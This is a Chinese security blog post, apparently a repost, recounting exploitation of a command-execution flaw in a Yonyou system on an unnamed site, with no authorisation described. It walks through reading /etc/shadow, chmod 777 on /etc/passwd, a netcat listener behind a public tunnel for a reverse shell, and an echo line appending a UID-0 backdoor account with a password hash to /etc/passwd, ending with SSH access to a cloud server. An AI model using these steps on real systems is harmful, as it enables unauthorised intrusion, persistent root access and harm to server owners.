记一次远程命令执行漏洞提权过程

2023-04-25 9,282
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

来源:https://blog.csdn.net/u010025272/


现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安设为星标”,否则可能看不到了!!!


正文

某站用友的命令执行漏洞,测试 print hello 发现可以执行命令


whami id 都查一波权限,发现是 root,权限这么大,很好搞啊


ps -ef | grep sshd 查一波发现可以ssh连接,直接 useradd 用户,但是整个 shell 无法给用户添加密码,无法远程登录,怎么搞,直接读 shadow 哈希,爆破密码


爆破无结果,头大,怎么搞,思考5分钟,可以直接写 passwd 啊,试一波


再次查看 shadow 居然没写进去,难道权限不对,ls -alrt /etc/passwd 发现权限是 544,直接 chmod 777 /etc/passwd 改权限,继续写,依然写不进去。

换了各种姿势,都不行,难住我了,突然想起了 nc 反弹,一般 linux 都装有 nc ,这个有没有,查一波


果然不错,有 nc ,通过 dnslog 查一下是否有外连


能 ping 通,果然能外连,那就可以通过 nc 反弹搞一波了,本地的攻击机在内网,内网穿透一波,我一般用 https://www.uulap.com/ 大家可以试试


将本地的 6666 端口映射到公网


本地建立监听 nc -l -n -v -p 6666


让目标机进行 nc 反弹


果然反弹回来了,直接上命令,加用户
echo ‘用户名:LRxM3nP3LOiYU:0:0:hello:/root:/bin/bash’ >> /etc/passwd


查看已经添加成功,直接ssh连接,发现是阿里云的服务器


至此结束,收工!


本文作者:潇湘信安

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/199560.html

Tags:
评论  (0)
快来写下你的想法吧!

潇湘信安

文章数:57 积分: 15

关注微信公众号【潇湘信安】,一起学习网络安全知识!

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号